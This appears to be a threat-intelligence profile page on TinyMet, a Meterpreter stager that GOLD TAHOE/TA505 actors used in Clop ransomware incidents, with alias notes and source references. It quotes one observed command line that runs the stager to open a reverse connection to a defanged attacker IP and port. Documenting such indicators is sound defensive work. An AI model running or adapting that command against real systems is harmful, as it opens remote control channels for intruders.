Tinymet

Malware updated 6 months ago (2024-05-04T20:19:09.267Z)

Download STIX

Preview STIX

TinyMet is a type of malware, specifically a tiny, flexible Meterpreter stager, that can infiltrate systems and cause significant damage. It has been used by threat actors like GOLD TAHOE to retrieve the TinyMet Meterpreter stager in Clop ransomware incidents. This harmful program can infect your system through suspicious downloads, emails, or websites and once inside, it can steal personal information, disrupt operations, or even hold your data hostage for ransom. The malware was observed being executed with the command c:\intel\wsus.exe 1 91.214.124[.]20 43434, indicating a reverse HTTP connection, and connected to a malicious IP address by either renaming a binary or providing specific arguments. The investigation into these incidents revealed that the threat actor has a possible link to the TinyMet Payload v0.2. This payload was previously used by Clop Ransomware as a precursor for the TA505 Post-Exploitation Operation. The use of this payload indicates a sophisticated level of attack planning and execution, suggesting that the threat actors are experienced and highly skilled. Our team discovered a file named wsus.exe, which appears to be a version of TinyMet, along with three additional files that were created and executed on the first compromised system. This file primarily operates as a version of TinyMet—an open-source Meterpreter stager—but the actors also have the option to store and execute any binary loaded into the table. This flexibility allows the threat actors to adapt their approach based on the specific vulnerabilities of the targeted system.

Description last updated: 2024-03-05T19:34:47.952Z

What's your take? (Question 1 of 3)

Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.

Possible Aliases / Cluster overlaps

It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at. Create a free account to see the source evidence for each alias, and help fix any errors.

Alias Description	Votes
Meterpreter is a possible alias for Tinymet. Meterpreter is a type of malware that is part of the Metasploit penetration testing software. It serves as an attack payload and provides an interactive shell, allowing threat actors to control and execute code on a compromised system. Advanced Persistent Threat (APT) actors have created and used a	2
Meterpreter Stager is a possible alias for Tinymet. The Meterpreter stager is a type of malware, which is malicious software designed to infiltrate and exploit computer systems. It can enter your system through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it has the potential to steal personal information, di	2

Miscellaneous Associations

Other elements of context that could aid in the identification of relevance

Clop

Ransomware

Analyst Notes & Discussion

Be the first to leave your mark here! Log in to share your views and vote.

Source Document References

Information about the Tinymet Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more

Source Link	CreatedAt	Title
Secureworks	2 years ago	Phases of a Post-Intrusion Ransomware Attack
MITRE	2 years ago	Egregor Ransomware – A Deep Dive Into Its Activities and Techniques
MITRE	2 years ago	FIN7 Revisited: Inside Astra Panel and SQLRat Malware
MITRE	2 years ago	TA505 Continues to Infect Networks With SDBbot RAT